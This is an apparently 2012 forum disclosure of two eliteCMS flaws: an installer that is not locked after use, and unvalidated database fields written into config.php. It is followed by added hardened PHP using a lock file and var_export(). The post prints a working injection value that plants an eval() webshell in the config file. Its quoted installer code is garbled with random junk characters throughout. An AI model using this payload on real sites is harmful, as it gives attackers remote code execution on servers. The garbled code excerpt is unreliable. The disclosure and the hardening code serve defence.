eliteCMS: installer not locked after installation + one-line webshell written into config.php

Original poster, posted on 2012-11-18 13:59:27
The eliteCMS installer is not locked once installation has finished, so anyone who can reach the installer URL can run the installation again.

A second issue is that the installer can be made to write a one-line webshell directly into admin/includes/config.php.

Let's look at the code:

# s0 a8 b; |1 C) M' \" F...
0 d! f8 a: f$ qelseif ($_GET['step'] == "4") {$ j& ?) g. F: `* ], G: P
    $file = "../admin/includes/config.php";
* J# Q/ U, B- z% i9 d8 J    $write = "<?php\n";& d' C+ x  Y7 L& T3 }; U
    $write .= "/**\n";
; G: ~5 c. ?1 H    $write .= "*\n";
. ^9 W' {. Q) Q& Z1 `    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
0 d7 y5 F, \- h+ C4 r  E...略...7 B3 e8 _& ?! c8 F
    $write .= "*\n";- }& ~+ t' X/ f, K9 D" _
    $write .= "*/\n";3 y7 |1 r" u& C; c5 e' F( {5 p
    $write .= "\n";
  @" m1 e7 y4 S6 Q# U) m    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";& L1 Y, ^9 u& ^0 l
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";, |/ m4 y. g+ \% w7 q- v
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
" K* N* M/ z& w* i    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";! ~7 ~( \, j$ B# h- ]3 S
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";* _7 `2 ~5 ^* ^" R
    $write .= "if (!\$connection) {\n";
4 g2 w$ _% ^9 v# l    $write .= "        die(\"Database connection failed\" .mysql_error());\n";$ q  a  @: i. ]! E
    $write .= "        \n";
1 ]  M8 o2 _6 a/ ?    $write .= "} \n";
! e; W8 R& F8 k    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
5 B- M" F/ X( x    $write .= "if (!\$db_select) {\n";9 N. k( S0 b- \" B; b3 K- G4 X% A
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
" O* W2 W. N% w" J    $write .= "        \n";/ b4 t8 U9 V  a3 P
    $write .= "} \n";) x$ R5 T1 z' i3 A  Y- |
    $write .= "?>\n";
1 \! X( Z+ v  \   F# P, M' r/ w
    $writer = fopen($file, 'w');! i) T& Z$ e$ t1 Q+ c5 k/ A: k& H$ |
...
" t% P' Z. B. ^: f" T' q7 _' T 1 m8 S0 F3 e; N
Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken without any validation. If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
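The following is an added example, not eliteCMS code, showing how the step-4 writer above could be hardened against both problems: an install lock file that stops the installer from running twice, and var_export() so that a submitted value is always emitted as a PHP string literal instead of being spliced into the source text. Function names, the lock file path and the validation rules are assumptions for this example; mysqli_* is used because the mysql_* functions no longer exist in current PHP.

```php
<?php
// Added example (not eliteCMS code): a hardened replacement for the config
// writer shown in the post. Two fixes:
//   1. refuse to run once an install lock exists (stops re-installation);
//   2. emit settings with var_export() so a value such as
//      "?><?php eval($_POST[c]);?><?php  stays inside a PHP string literal.
// Function names, lock file and validation rules are assumptions.

// Reject anything that is not a plausible value for that setting before it
// ever reaches the config file (constructed rules, not the project's own).
function validate_db_settings(array $in): array
{
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9._:-]{1,255}$/',   // host[:port]
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',        // MySQL identifier
        'DB_USER'   => '/^[A-Za-z0-9_.-]{1,32}$/',
        'DB_PASS'   => '/^[^\x00-\x1f\x7f]{0,128}$/',   // no control chars
    ];
    $out = [];
    foreach ($rules as $key => $re) {
        $val = isset($in[$key]) ? (string) $in[$key] : '';
        if (!preg_match($re, $val)) {
            throw new InvalidArgumentException("Rejected value for $key");
        }
        $out[$key] = $val;
    }
    return $out;
}

// Build the config source. var_export() produces a single-quoted PHP literal
// with ' and \ escaped, so the value can never terminate the string or the
// <?php block, regardless of what was submitted.
function render_config(array $settings): string
{
    $src = "<?php\n// generated by the installer; do not edit by hand\n";
    foreach ($settings as $key => $val) {
        $src .= sprintf("define(%s, %s);\n",
            var_export($key, true), var_export($val, true));
    }
    $src .= "\$connection = mysqli_connect(DB_SERVER, DB_USER, DB_PASS, DB_NAME);\n";
    $src .= "if (!\$connection) {\n";
    $src .= "    die('Database connection failed: ' . mysqli_connect_error());\n";
    $src .= "}\n";
    return $src;
}

// Write the config only if no lock file exists, creating the lock with
// fopen() mode 'x' (exclusive create) so a concurrent second run also fails.
function write_config_once(string $file, string $lockFile, array $postData): void
{
    if (file_exists($lockFile)) {
        throw new RuntimeException('Installation already completed; remove the installer.');
    }
    $settings = validate_db_settings($postData);   // throws on bad input
    $lock = @fopen($lockFile, 'x');                 // fails if it appeared meanwhile
    if ($lock === false) {
        throw new RuntimeException('Could not create install lock.');
    }
    fwrite($lock, date('c') . "\n");
    fclose($lock);
    if (file_put_contents($file, render_config($settings), LOCK_EX) === false) {
        throw new RuntimeException("Could not write $file");
    }
}

// Demonstration with the payload quoted in the post (constructed input).
$payload = '"?><?php eval($_POST[c]);?><?php';

// Even without validation, the value lands inside a quoted literal:
//   define('DB_NAME', '"?><?php eval($_POST[c]);?><?php');
echo render_config(['DB_NAME' => $payload]);

// With validation it never gets that far:
try {
    validate_db_settings(['DB_SERVER' => 'localhost', 'DB_NAME' => $payload,
                          'DB_USER' => 'elite', 'DB_PASS' => 'secret']);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";   // Rejected value for DB_NAME
}
```

The lock check and the literal-safe rendering are independent: the lock alone would still leave the first, legitimate installation run exposed to a crafted form submission, and safe rendering alone would still let the installer be re-run to point the site at an attacker-controlled database. Both are needed, and the installer directory should additionally be deleted once installation succeeds.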